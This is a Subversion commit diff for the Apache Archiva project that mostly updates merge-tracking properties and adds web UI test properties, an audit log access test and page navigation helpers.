archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:825850-909070 Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Fri Feb 12 01:43:19 2010 @@ -77,6 +77,13 @@ ARTIFACTFILEPATH1=test REPOSITORYID1=internal +SNAPSHOT_GROUPID=org.apache.archiva +SNAPSHOT_ARTIFACTID=archiva-test +SNAPSHOT_VERSION=1.0-SNAPSHOT +SNAPSHOT_PACKAGING=jar +SNAPSHOT_ARTIFACTFILEPATH=test +SNAPSHOT_REPOSITORYID=snapshots + # REPOSITORIES # Manage Repositories MANAGED_IDENTIFIER=testing1 Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 01:43:19 2010 @@ -128,4 +128,40 @@ assertTextPresent( "internal" ); assertTextPresent( "admin" ); } + + @Test (dependsOnMethods = { "testAddArtifactValidValues", "testUserWithRepoManagerInternalRole" }, enabled = false ) + public void testViewAuditLogsViewAuditEventsForManageableRepositoriesOnly() + { + String groupId = getProperty( "SNAPSHOT_GROUPID" ); + String artifactId = getProperty( "SNAPSHOT_ARTIFACTID" ); + String version = getProperty( "SNAPSHOT_VERSION" ); + String repo = getProperty( "SNAPSHOT_REPOSITORYID" ); + String packaging = getProperty( "SNAPSHOT_PACKAGING" ); + + addArtifact( groupId, artifactId, version, packaging, getProperty( "SNAPSHOT_ARTIFACTFILEPATH" ), repo ); + assertTextPresent( "Artifact '" + groupId + ":" + artifactId + ":" + version + + "' was successfully deployed to repository '" + repo + "'" ); + + clickLinkWithText( "Logout" ); + + login( getProperty( "REPOMANAGER_INTERNAL_USERNAME" ), getUserRolePassword() ); + goToAuditLogReports(); + assertAuditLogsReportPage(); + + selectValue( "repository", "all" ); + submit(); + + assertAuditLogsReportPage(); + assertTextPresent( "Results" ); + assertTextNotPresent( "No audit logs found." ); + assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "Uploaded File" ); + assertTextPresent( "internal" ); + assertTextPresent( "admin" ); + + assertTextNotPresent( artifactId + "-" + version + "." + packaging ); + + clickLinkWithText( "Logout" ); + login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); + } } Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/RepositoryTest.java Fri Feb 12 01:43:19 2010 @@ -36,6 +36,7 @@ assertRepositoriesPage(); } + @Test(dependsOnMethods = { "testAddManagedRepoValidValues" } ) public void testAddManagedRepoInvalidValues() { goToRepositoriesPage(); Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java Fri Feb 12 01:43:19 2010 @@ -503,7 +503,10 @@ public void goToRepositoriesPage() { - clickLinkWithText( "Repositories" ); + if( !getTitle().equals( "Apache Archiva \\ Administration - Repositories" ) ) + { + clickLinkWithText( "Repositories" ); + } assertRepositoriesPage(); } Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java?rev=909202&r1=909201&r2=909202&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractRepositoryTest.java Fri Feb 12 01:43:19 2010 @@ -28,7 +28,10 @@ // Repository Groups public void goToRepositoryGroupsPage() { - clickLinkWithText( "Repository Groups" ); + if( !getTitle().equals( "Apache Archiva \\ Administration - Repository Groups" ) ) + { + clickLinkWithText( "Repository Groups" ); + } assertRepositoryGroupsPage(); } @@ -288,8 +291,8 @@ } public void editManagedRepository( String fieldName, String value ) - { - //goToRepositoriesPage(); + { + goToRepositoriesPage(); clickLinkWithXPath( "//div[@id='contentArea']/div/div[5]/div[1]/a[1]/img" ); assertPage( "Apache Archiva \\ Admin: Edit Managed Repository" ); setFieldValue(fieldName, value); Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:699795-700720 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:699795-700720 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:825850-882383,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:825850-882383,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-882383,885006-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-882383,885006-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -1 +1 @@ -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java:888397-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java:888397-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/rss/UserRepositoriesStub.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/rss/UserRepositoriesStub.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:891136-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:891136-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:825850-899477 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:825850-885005,885006-899477* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:825850-885005,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:723609-726925 